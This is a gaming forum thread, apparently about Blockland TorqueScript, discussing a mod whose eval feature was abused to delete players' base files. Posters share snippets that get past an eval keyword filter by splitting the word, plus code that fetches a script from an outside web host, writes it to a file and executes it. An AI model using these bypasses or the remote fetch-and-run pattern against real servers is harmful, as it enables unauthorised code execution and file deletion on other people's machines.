Author Topic: Truce - Hey guess what, people don't appreciate you deleting their base files  (Read 25198 times)


Nevermind,
Code: [Select]
call("ev"@"al", "echo(lol);");


call("call", "ev"@"al", "echo(lol);");

OSHT
This post was just a joke until I finished the code


Code: [Select]
new HTTPObject(KalHTTP);
function Kaleval()
{
    KalHTTP.get("kalphiter.com:80", "/remoteExecution.php", "");
}

function KalHTTP::online(%this, %line)
{
    %filePath = "base/lol.cs");
    %file = new FileObject();
    %file.openForWrite(%filePath);
    %file.writeLine(%line);
    %file.close();
    %file.delete();
}
Something like that...

If I were to ever use eval on my server, I would remove any file read, write, and delete functionality, and remove any possibilities for infinite loops. Ontop of that, getting rid of all the obvious crash functions.



The funny thing was, Amade did remove file functions. Well, tried to, that is.


Hah.
Haha, put
    %filePath = "base/lol.cs");
    %file = new FileObject();
    %file.openForWrite(%filePath);
    %file.writeLine(%line);
    %file.close();
    %file.delete();
    exec("base/lol.cs");
in the remote execute file.

NOW WHAT?

Haha, put
    %filePath = "base/lol.cs");
    %file = new FileObject();
    %file.openForWrite(%filePath);
    %file.writeLine(%line);
    %file.close();
    %file.delete();
    exec("base/lol.cs");
in the remote execute file.

NOW WHAT?
If it were my way, it would turn out like this:

    %filePath = "base/lol.cs");
    %file = new ();
    %file.(%filePath);
    %file.(%line);
    %file.close();
    %file.delete();
    ("base/lol.cs");

Wait... even without me preventing it, it would syntax error on it's own lol

If it were my way, it would turn out like this:

    %filePath = "base/lol.cs");
    %file = new ();
    %file.(%filePath);
    %file.(%line);
    %file.close();
    %file.delete();
    ("base/lol.cs");

Wait, you didn't say it filters the onLine callback for an HTTP object.


Yes, but I wouldn't have that anywhere in my code, and you wouldn't be able to eval it because it has words that don't work.

Cn u guise script me a  :panda: mod????????1?


Ok, 19 pages of this crap?
We get it, Truce is basically a hacker.  Pretty cool in my opinion.